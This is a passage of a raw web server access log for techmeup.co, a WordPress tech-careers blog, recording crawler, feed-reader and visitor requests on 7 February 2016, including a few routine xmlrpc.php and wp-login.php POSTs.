HTTP/1.1\" 301 502 \"-\" \"Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/31.0\"\n188.138.17.205 - - [07/Feb/2016:12:03:08 -0800] \"GET /sitemap.xml HTTP/1.1\" 200 2928 \"-\" \"-\"\n80.12.63.146 - - [07/Feb/2016:12:08:13 -0800] \"GET /wp-content/themes/great/images/twitter.png HTTP/1.1\" 200 4483 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13D15 Safari/601.1\"\n62.210.250.66 - - [07/Feb/2016:12:12:18 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 433 \"http://hnwatcher.com/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36\"\n62.210.250.66 - - [07/Feb/2016:12:21:33 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 433 \"http://hnwatcher.com/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36\"\n180.76.15.6 - - [07/Feb/2016:12:25:04 -0800] \"GET / HTTP/1.1\" 200 7237 \"-\" \"Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)\"\n213.245.234.126 - - [07/Feb/2016:12:27:12 -0800] \"GET /apple-touch-icon-precomposed.png HTTP/1.1\" 404 4871 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n213.245.234.126 - - [07/Feb/2016:12:27:24 -0800] \"GET /apple-touch-icon.png HTTP/1.1\" 404 4872 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n62.210.250.66 - - [07/Feb/2016:12:27:51 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 433 \"http://hnwatcher.com/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36\"\n209.133.111.211 - - [07/Feb/2016:12:32:10 -0800] \"GET /feed/ HTTP/1.1\" 200 20931 \"-\" \"rogerbot/1.0 (http://www.moz.com/dp/rogerbot, rogerbot-crawler@moz.com)\"\n198.58.102.155 - - [07/Feb/2016:12:37:55 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n93.76.54.179 - - [07/Feb/2016:12:44:01 -0800] \"POST /wp-login.php HTTP/1.0\" 200 3816 \"-\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\"\n178.255.215.65 - - [07/Feb/2016:12:51:48 -0800] \"GET /2014/04/ HTTP/1.1\" 200 6133 \"-\" \"Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)\"\n178.255.215.65 - - [07/Feb/2016:12:52:41 -0800] \"GET /2014/08/ HTTP/1.1\" 200 6266 \"-\" \"Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)\"\n88.190.38.63 - - [07/Feb/2016:12:56:01 -0800] \"GET /wp-content/themes/great/js/modernizr.min.js HTTP/1.1\" 200 6228 \"http://techmeup.co/du-travail-pour-les-epoux-epouses-dimmigres-tech-aux-us/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n88.190.38.63 - - [07/Feb/2016:12:56:01 -0800] \"GET /wp-content/plugins/wp-shortcode/css/wp-shortcode.css?ver=4.1.1 HTTP/1.1\" 200 2050 \"http://techmeup.co/du-travail-pour-les-epoux-epouses-dimmigres-tech-aux-us/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n88.190.38.63 - - [07/Feb/2016:12:56:01 -0800] \"GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 HTTP/1.1\" 200 3421 \"http://techmeup.co/du-travail-pour-les-epoux-epouses-dimmigres-tech-aux-us/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n88.190.38.63 - - [07/Feb/2016:12:56:02 -0800] \"GET /wp-includes/js/comment-reply.min.js?ver=4.1.1 HTTP/1.1\" 200 757 \"http://techmeup.co/du-travail-pour-les-epoux-epouses-dimmigres-tech-aux-us/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n88.190.38.63 - - [07/Feb/2016:12:56:02 -0800] \"GET /wp-content/uploads/2014/04/tumblr_inline_n43vwqRZpY1r792z4-50x50.jpg HTTP/1.1\" 200 2491 \"http://techmeup.co/du-travail-pour-les-epoux-epouses-dimmigres-tech-aux-us/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n88.190.38.63 - - [07/Feb/2016:12:56:02 -0800] \"GET /wp-content/themes/great/images/twitter.png HTTP/1.1\" 200 4482 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n88.190.38.63 - - [07/Feb/2016:12:56:02 -0800] \"POST /wp-admin/admin-ajax.php HTTP/1.1\" 200 592 \"http://techmeup.co/du-travail-pour-les-epoux-epouses-dimmigres-tech-aux-us/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n88.167.87.4 - - [07/Feb/2016:13:00:32 -0800] \"GET /wp-content/themes/great/js/modernizr.min.js HTTP/1.1\" 200 6229 \"https://www.google.fr/\" \"Mozilla/5.0 (Linux; Android 4.4.4; TF300T Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Safari/537.36\"\n88.167.87.4 - - [07/Feb/2016:13:00:32 -0800] \"GET /wp-content/plugins/wp-shortcode/css/tipsy.css?ver=4.1.1 HTTP/1.1\" 200 868 \"https://www.google.fr/\" \"Mozilla/5.0 (Linux; Android 4.4.4; TF300T Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Safari/537.36\"\n88.167.87.4 - - [07/Feb/2016:13:00:42 -0800] \"GET /trouver-un-job-tech-a-san-francisco-ou-dans-la/ HTTP/1.1\" 200 15508 \"https://www.google.fr/\" \"Mozilla/5.0 (Linux; Android 4.4.4; TF300T Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Safari/537.36\"\n88.167.87.4 - - [07/Feb/2016:13:00:44 -0800] \"GET /wp-includes/js/comment-reply.min.js?ver=4.1.1 HTTP/1.1\" 200 758 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Linux; Android 4.4.4; TF300T Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Safari/537.36\"\n88.167.87.4 - - [07/Feb/2016:13:00:47 -0800] \"GET /wp-content/uploads/2014/06/tumblr_inline_n6zugoFw371sygmpd-50x50.jpg HTTP/1.1\" 200 2091 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Linux; Android 4.4.4; TF300T Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Safari/537.36\"\n88.167.87.4 - - [07/Feb/2016:13:00:50 -0800] \"GET /wp-content/themes/great/images/linkedin.png HTTP/1.1\" 200 4391 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (Linux; Android 4.4.4; TF300T Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Safari/537.36\"\n88.167.87.4 - - [07/Feb/2016:13:00:53 -0800] \"GET /wp-content/themes/great/images/arrow.png HTTP/1.1\" 200 437 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (Linux; Android 4.4.4; TF300T Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Safari/537.36\"\n178.137.17.196 - - [07/Feb/2016:13:01:37 -0800] \"GET /steeve-morin-de-google-a-lentreprenariat/ HTTP/1.1\" 200 29341 \"http://guruofcasino.com/\" \"Opera/9.00 (Windows NT 5.1; U; en)\"\n178.137.17.196 - - [07/Feb/2016:13:01:39 -0800] \"GET /steeve-morin-de-google-a-lentreprenariat/ HTTP/1.1\" 200 29425 \"http://guruofcasino.com/\" \"Opera/9.00 (Windows NT 5.1; U; en)\"\n2.1.72.179 - - [07/Feb/2016:13:06:24 -0800] \"GET /rss HTTP/1.1\" 304 163 \"http://techmeup.co/rss\" \"FreshRSS/1.0.0 (Linux; http://freshrss.org) SimplePie/1.4-dev-FreshRSS\"\n92.222.20.166 - - [07/Feb/2016:13:08:37 -0800] \"GET /rss HTTP/1.1\" 304 163 \"-\" \"Tiny Tiny RSS/16.1 (c352248) (http://tt-rss.org/)\"\n199.16.156.125 - - [07/Feb/2016:13:12:26 -0800] \"GET /les-francais-genies-de-la-silicon-valley HTTP/1.1\" 301 381 \"-\" \"Twitterbot/1.0\"\n82.237.33.174 - - [07/Feb/2016:13:13:01 -0800] \"GET /apple-touch-icon.png HTTP/1.1\" 404 4872 \"-\" \"Safari/11601.1.56 CFNetwork/760.0.5 Darwin/15.0.0 (x86_64)\"\n82.237.33.174 - - [07/Feb/2016:13:13:13 -0800] \"GET /trouver-un-job-tech-a-san-francisco-ou-dans-la-silicon HTTP/1.1\" 404 4871 \"-\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 8_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B410 Safari/600.1.4\"\n178.255.215.65 - - [07/Feb/2016:13:16:00 -0800] \"GET /je-viens-chercher-mon-stage-dans-la-silicon-valley/feed/ HTTP/1.1\" 200 888 \"-\" \"Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)\"\n178.255.215.65 - - [07/Feb/2016:13:16:13 -0800] \"GET /textme-cest-de-la-bombe HTTP/1.1\" 301 383 \"-\" \"Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)\"\n178.255.215.65 - - [07/Feb/2016:13:16:21 -0800] \"GET /textme-cest-de-la-bombe/ HTTP/1.1\" 200 8612 \"-\" \"Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)\"\n54.90.112.11 - - [07/Feb/2016:13:24:50 -0800] \"GET /category/europe/feed/ HTTP/1.1\" 200 27874 \"-\" \"Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)\"\n90.41.103.221 - - [07/Feb/2016:13:29:41 -0800] \"GET /wp-content/themes/great/style.css HTTP/1.1\" 200 7662 \"http://techmeup.co/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.0.1 Safari/601.2.7\"\n90.41.103.221 - - [07/Feb/2016:13:29:41 -0800] \"GET /wp-content/themes/great/js/customscript.js HTTP/1.1\" 200 3601 \"http://techmeup.co/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.0.1 Safari/601.2.7\"\n90.41.103.221 - - [07/Feb/2016:13:29:41 -0800] \"GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 HTTP/1.1\" 200 3421 \"http://techmeup.co/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.0.1 Safari/601.2.7\"\n90.41.103.221 - - [07/Feb/2016:13:29:42 -0800] \"GET /wp-content/plugins/disqus-comment-system/media/js/count.js?ver=4.1.1 HTTP/1.1\" 200 776 \"http://techmeup.co/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.0.1 Safari/601.2.7\"\n90.41.103.221 - - [07/Feb/2016:13:29:42 -0800] \"GET /wp-content/uploads/2015/03/Mathilde-le-Rouzic-Quaelead-300x225.jpg HTTP/1.1\" 200 16230 \"http://techmeup.co/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.0.1 Safari/601.2.7\"\n90.41.103.221 - - [07/Feb/2016:13:29:42 -0800] \"GET /wordpress/wp-content/uploads/2015/02/logo-text1.png HTTP/1.1\" 200 5144 \"http://techmeup.co/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.0.1 Safari/601.2.7\"\n90.41.103.221 - - [07/Feb/2016:13:29:42 -0800] \"GET /wp-content/uploads/2015/03/1-9mRgHn-sBX_FQuA08m4kdA-300x225.jpeg HTTP/1.1\" 200 9484 \"http://techmeup.co/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.0.1 Safari/601.2.7\"\n90.41.103.221 - - [07/Feb/2016:13:29:42 -0800] \"GET /wp-content/themes/great/images/search.png HTTP/1.1\" 200 1683 \"http://techmeup.co/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.0.1 Safari/601.2.7\"\n66.249.64.137 - - [07/Feb/2016:13:35:38 -0800] \"GET / HTTP/1.1\" 200 7273 \"-\" \"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\"\n66.249.64.132 - - [07/Feb/2016:13:40:17 -0800] \"GET /wp-content/plugins/disqus-comment-system/media/js/count.js?ver=4.1.1 HTTP/1.1\" 200 776 \"-\" \"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\"\n66.249.64.138 - - [07/Feb/2016:13:40:19 -0800] \"GET /wp-content/plugins/wp-shortcode/js/jquery.tipsy.js?ver=4.1.1 HTTP/1.1\" 200 3065 \"-\" \"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\"\n66.249.64.132 - - [07/Feb/2016:13:40:21 -0800] \"GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 HTTP/1.1\" 200 3421 \"-\" \"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\"\n66.249.64.250 - - [07/Feb/2016:13:40:23 -0800] \"GET /wp-content/plugins/easy-twitter-feed-widget/lib/js/widget-easy-twitter-feed-widget.js?ver=1.0 HTTP/1.1\" 200 663 \"-\" \"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\"\n198.58.103.92 - - [07/Feb/2016:13:49:51 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n54.219.246.6 - - [07/Feb/2016:13:52:06 -0800] \"GET /feed/ HTTP/1.1\" 304 182 \"-\" \"Digg Feed Fetcher 1.0 (Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_1) AppleWebKit/534.48.3 (KHTML, like Gecko) Version/5.1 Safari/534.48.3)\"\n78.194.25.109 - - [07/Feb/2016:13:55:13 -0800] \"GET /wordpress/wp-content/uploads/2015/02/favico.png HTTP/1.1\" 200 986 \"-\" \"Reeder/3.0 CFNetwork/758.2.8 Darwin/15.0.0\"\n78.194.25.109 - - [07/Feb/2016:13:55:13 -0800] \"HEAD /apple-touch-icon-precomposed.png HTTP/1.1\" 404 447 \"-\" \"Reeder/3.0 CFNetwork/758.2.8 Darwin/15.0.0\"\n92.158.139.3 - - [07/Feb/2016:14:01:19 -0800] \"GET /wp-content/themes/great/style.css HTTP/1.1\" 200 7662 \"http://techmeup.co/adrien-duermael-pixowl-et-lindustrie/\" \"Mozilla/5.0 (Linux; Android 4.4.2; GT-N5100 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Safari/537.36\"\n92.158.139.3 - - [07/Feb/2016:14:01:19 -0800] \"GET /wp-content/plugins/wp-shortcode/css/tipsy.css?ver=4.1.1 HTTP/1.1\" 200 868 \"http://techmeup.co/adrien-duermael-pixowl-et-lindustrie/\" \"Mozilla/5.0 (Linux; Android 4.4.2; GT-N5100 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Safari/537.36\"\n92.158.139.3 - - [07/Feb/2016:14:01:19 -0800] \"GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 HTTP/1.1\" 200 3421 \"http://techmeup.co/adrien-duermael-pixowl-et-lindustrie/\" \"Mozilla/5.0 (Linux; Android 4.4.2; GT-N5100 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Safari/537.36\"\n92.158.139.3 - - [07/Feb/2016:14:01:19 -0800] \"GET /wp-content/plugins/easy-twitter-feed-widget/lib/js/widget-easy-twitter-feed-widget.js?ver=1.0 HTTP/1.1\" 200 663 \"http://techmeup.co/adrien-duermael-pixowl-et-lindustrie/\" \"Mozilla/5.0 (Linux; Android 4.4.2; GT-N5100 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Safari/537.36\"\n92.158.139.3 - - [07/Feb/2016:14:01:19 -0800] \"GET /wp-content/uploads/2015/03/1-9mRgHn-sBX_FQuA08m4kdA-50x50.jpeg HTTP/1.1\" 200 1592 \"http://techmeup.co/adrien-duermael-pixowl-et-lindustrie/\" \"Mozilla/5.0 (Linux; Android 4.4.2; GT-N5100 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Safari/537.36\"\n92.158.139.3 - - [07/Feb/2016:14:01:20 -0800] \"GET /wp-content/themes/great/images/search.png HTTP/1.1\" 200 1683 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (Linux; Android 4.4.2; GT-N5100 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Safari/537.36\"\n92.158.139.3 - - [07/Feb/2016:14:01:26 -0800] \"GET /adrien-duermael-pixowl-et-lindustrie/apple-touch-icon.png HTTP/1.1\" 404 4872 \"http://techmeup.co/adrien-duermael-pixowl-et-lindustrie/\" \"Mozilla/5.0 (Linux; Android 4.4.2; GT-N5100 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Safari/537.36\"\n85.27.50.18 - - [07/Feb/2016:14:06:16 -0800] \"GET /wp-content/uploads/2015/06/unnamed-300x225.jpg HTTP/1.1\" 200 25163 \"https://www.google.fr/\" \"Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11B554a Safari/9537.53\"\n85.27.50.18 - - [07/Feb/2016:14:07:08 -0800] \"GET /wp-content/uploads/2015/06/sylvia.png HTTP/1.1\" 200 803660 \"https://www.google.fr/\" \"Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11B554a Safari/9537.53\"\n85.27.50.18 - - [07/Feb/2016:14:08:21 -0800] \"GET /wp-content/uploads/2014/11/tumblr_inline_nfgbauhtUn1r1bjfi-300x225.png HTTP/1.1\" 200 80082 \"https://www.google.fr/\" \"Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11B554a Safari/9537.53\"\n85.27.50.18 - - [07/Feb/2016:14:09:02 -0800] \"GET /wp-content/uploads/2015/02/3152875867_148b09f57d_z-300x225.jpg HTTP/1.1\" 200 9568 \"https://www.google.fr/\" \"Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11B554a Safari/9537.53\"\n68.180.228.42 - - [07/Feb/2016:14:13:36 -0800] \"GET /2014/08/ HTTP/1.1\" 200 6247 \"-\" \"Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)\"\n80.118.5.210 - - [07/Feb/2016:14:29:35 -0800] \"GET /wp-content/plugins/hupso-share-buttons-for-twitter-facebook-google/style.css?ver=4.1.1 HTTP/1.1\" 200 416 \"http://techmeup.co/je-viens-chercher-mon-stage-dans-la-silicon-valley/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2638.0 Safari/537.36\"\n80.118.5.210 - - [07/Feb/2016:14:29:35 -0800] \"GET /wp-content/themes/great/style.css HTTP/1.1\" 200 7663 \"http://techmeup.co/je-viens-chercher-mon-stage-dans-la-silicon-valley/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2638.0 Safari/537.36\"\n80.118.5.210 - - [07/Feb/2016:14:29:35 -0800] \"GET /wp-content/plugins/wp-shortcode/js/jquery.tipsy.js?ver=4.1.1 HTTP/1.1\" 200 3065 \"http://techmeup.co/je-viens-chercher-mon-stage-dans-la-silicon-valley/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2638.0 Safari/537.36\"\n80.118.5.210 - - [07/Feb/2016:14:29:35 -0800] \"GET /wp-content/plugins/wp-shortcode/js/wp-shortcode.js?ver=4.1.1 HTTP/1.1\" 200 831 \"http://techmeup.co/je-viens-chercher-mon-stage-dans-la-silicon-valley/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2638.0 Safari/537.36\"\n80.118.5.210 - - [07/Feb/2016:14:29:36 -0800] \"GET /wordpress/wp-content/uploads/2015/02/logo-text1.png HTTP/1.1\" 200 5144 \"http://techmeup.co/je-viens-chercher-mon-stage-dans-la-silicon-valley/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2638.0 Safari/537.36\"\n80.118.5.210 - - [07/Feb/2016:14:29:37 -0800] \"GET /wp-content/themes/great/images/linkedin.png HTTP/1.1\" 200 4390 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2638.0 Safari/537.36\"\n80.118.5.210 - - [07/Feb/2016:14:29:41 -0800] \"GET /wordpress/wp-content/uploads/2015/02/favico.png HTTP/1.1\" 200 987 \"http://techmeup.co/je-viens-chercher-mon-stage-dans-la-silicon-valley/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2638.0 Safari/537.36\"\n66.249.64.132 - - [07/Feb/2016:14:37:26 -0800] \"GET /mathieu-ghaleb-la-superstar-de-lombre/ HTTP/1.1\" 200 12281 \"-\" \"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\"\n92.136.54.206 - - [07/Feb/2016:14:39:08 -0800] \"GET /wordpress/wp-content/uploads/2015/02/logo-text1.png HTTP/1.1\" 200 5144 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (iPad; CPU OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13D15 Safari/601.1\"\n92.136.54.206 - - [07/Feb/2016:14:39:08 -0800] \"GET /wp-content/plugins/wp-shortcode/js/jquery.tipsy.js?ver=4.1.1 HTTP/1.1\" 200 3065 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (iPad; CPU OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13D15 Safari/601.1\"\n92.136.54.206 - - [07/Feb/2016:14:39:08 -0800] \"GET /wp-includes/js/comment-reply.min.js?ver=4.1.1 HTTP/1.1\" 200 757 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (iPad; CPU OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13D15 Safari/601.1\"\n92.136.54.206 - - [07/Feb/2016:14:39:08 -0800] \"GET /wp-content/plugins/disqus-comment-system/media/js/count.js?ver=4.1.1 HTTP/1.1\" 200 776 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (iPad; CPU OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13D15 Safari/601.1\"\n92.136.54.206 - - [07/Feb/2016:14:39:08 -0800] \"GET /wp-content/uploads/2014/09/logo-transparent-horizontal-1024x482.png HTTP/1.1\" 200 334990 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (iPad; CPU OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13D15 Safari/601.1\"\n92.136.54.206 - - [07/Feb/2016:14:39:09 -0800] \"GET /wp-content/themes/great/images/linkedin.png HTTP/1.1\" 200 4390 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (iPad; CPU OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13D15 Safari/601.1\"\n92.136.54.206 - - [07/Feb/2016:14:39:14 -0800] \"GET /trouver-un-job-tech-a-san-francisco-ou-dans-la/?cf_action=sync_comments&post_id=30 HTTP/1.1\" 200 308 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (iPad; CPU OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13D15 Safari/601.1\"\n217.86.68.105 - - [07/Feb/2016:14:46:57 -0800] \"GET /wp-content/themes/great/style.css HTTP/1.1\" 200 7662 \"http://techmeup.co/arnaud-barbier-un-bidouilleur-haute-voltige-au/\" \"Mozilla/5.0 (iPad; CPU OS 9_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13C75 Safari/601.1\"\n217.86.68.105 - - [07/Feb/2016:14:46:57 -0800] \"GET /wp-content/themes/great/js/customscript.js HTTP/1.1\" 200 3601 \"http://techmeup.co/arnaud-barbier-un-bidouilleur-haute-voltige-au/\" \"Mozilla/5.0 (iPad; CPU OS 9_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13C75 Safari/601.1\"\n217.86.68.105 - - [07/Feb/2016:14:46:57 -0800] \"GET /wp-content/plugins/wp-shortcode/css/tipsy.css?ver=4.1.1 HTTP/1.1\" 200 868 \"http://techmeup.co/arnaud-barbier-un-bidouilleur-haute-voltige-au/\" \"Mozilla/5.0 (iPad; CPU OS 9_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13C75 Safari/601.1\"\n217.86.68.105 - - [07/Feb/2016:14:46:57 -0800] \"GET /wp-includes/js/comment-reply.min.js?ver=4.1.1 HTTP/1.1\" 200 757 \"http://techmeup.co/arnaud-barbier-un-bidouilleur-haute-voltige-au/\" \"Mozilla/5.0 (iPad; CPU OS 9_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13C75 Safari/601.1\"\n217.86.68.105 - - [07/Feb/2016:14:46:57 -0800] \"GET /wp-content/uploads/2014/07/tumblr_inline_n7zuk0v8WY1sa6hof-50x50.jpg HTTP/1.1\" 200 2286 \"http://techmeup.co/arnaud-barbier-un-bidouilleur-haute-voltige-au/\" \"Mozilla/5.0 (iPad; CPU OS 9_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13C75 Safari/601.1\"\n217.86.68.105 - - [07/Feb/2016:14:46:58 -0800] \"GET /wp-content/themes/great/images/search.png HTTP/1.1\" 200 1683 \"http://techmeup.co/arnaud-barbier-un-bidouilleur-haute-voltige-au/\" \"Mozilla/5.0 (iPad; CPU OS 9_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13C75 Safari/601.1\"\n107.21.155.8 - - [07/Feb/2016:14:58:57 -0800] \"GET /category/how-to/feed/ HTTP/1.1\" 200 25451 \"-\" \"Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)\"\n89.156.5.207 - - [07/Feb/2016:15:01:12 -0800] \"GET /wp-content/uploads/2015/02/10527525_10153205547817652_3810498128776234928_n-300x300.jpg HTTP/1.1\" 200 